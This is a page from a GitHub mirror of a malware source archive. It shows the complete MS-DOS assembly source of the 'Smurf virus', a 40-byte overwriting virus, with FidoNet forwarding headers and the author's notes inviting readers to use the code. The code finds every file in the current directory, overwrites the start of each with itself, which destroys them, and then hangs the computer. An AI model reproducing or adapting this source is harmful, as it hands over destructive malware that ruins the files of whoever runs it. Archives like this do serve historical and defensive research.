ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 01:46:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
56aef1cd67
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir10.asm

101 lines
4.0 KiB
NASM
Raw Normal View History

Add files via upload
2021-01-13 00:04:54 +00:00
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
; Msg : 1 of 55
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:10
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : OW_40.ASM
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;.RealName: Max Ivanov
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
;* From : Ron Toler, 2:283/718 (06 Nov 94 16:13)
;* To : Doug Bryce
;* Subj : OW_40.ASM
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>>> Article From Evolution #2 - YAM '92
;
;Article Title: The Smurf Virus
;Author: Admiral Bailey
;---
; The Smurf virus [40 Bytes Long]
;
; Author : Admiral Bailey [YAM '92]
; Date : June 6 1992
; Language : Assembly [TASM 2.0]
;
; Notes:The Smurf virus was my first attempt at writing the smallest
; overwriting virus known. For a first attempt it wasn't that
; bad. So far I have got it down to 40 bytes. The record that
; does the same as this is about 38 bytes. So I gotta loose 2
; bytes in here somewhere. Well seeing as this small thing is
; probably the easiest virus in the world to disassemble, I have
; included the source in this issue of Evolution for all of you
; to take a look at. The source is for you to use. If you
; happend to make anything smaller using this source please just
; give recognition to myself, Admiral Bailey, saying that you got
; help looking at this source. The only thing that this does is
; find everyfile in the current directory and overwrite the 1st
; 40 bytes with itself. Then locks your computer while it is in
; a search loop looking for more file when there are none. A
; neat thing about this is that it displays its entire self to
; the screen when executed. Scan 91 notices this as the mini
; virus but I dont blame it seeing that you cant realy avoid
; scan when your virus gets this small. Well enjoy the source...
; and remember if you use it and enjoy it just let me know.
;---
code segment
assume ds:code, ss:code, cs:code, es:code
org 100h ;Make it a .com file
virus_start equ $
start:
mov dx,offset file_type ;type of file to look for
mov ah,4eh ;Find first file command
infect:
int 21h
mov ax,3d02h ;open again to reset handle
mov dx,80h+1eh ;moves filename into dx
int 21h
mov bx,ax ;save handle again
mov cx,virus_length ;put size of virus in cx
mov dx,100h ;where the code starts
mov ah,40h ;write to handle command
int 21h ;write virus into file
mov ah,3eh ;close handle service
int 21h ;do it
find_next_file:
mov ah,4fh ;find next file command
jmp infect
file_type db '*.*',0
virus_end equ $
virus_length = virus_end - virus_start ;length of virus
code ends
end start
;-+- GoldED 2.50.B1016+
; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; <20> The Me<4D>eO
;
;/yx Extended memory swapping
;
;--- Aidstest Null: /Kill
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
Reference in New Issue Copy Permalink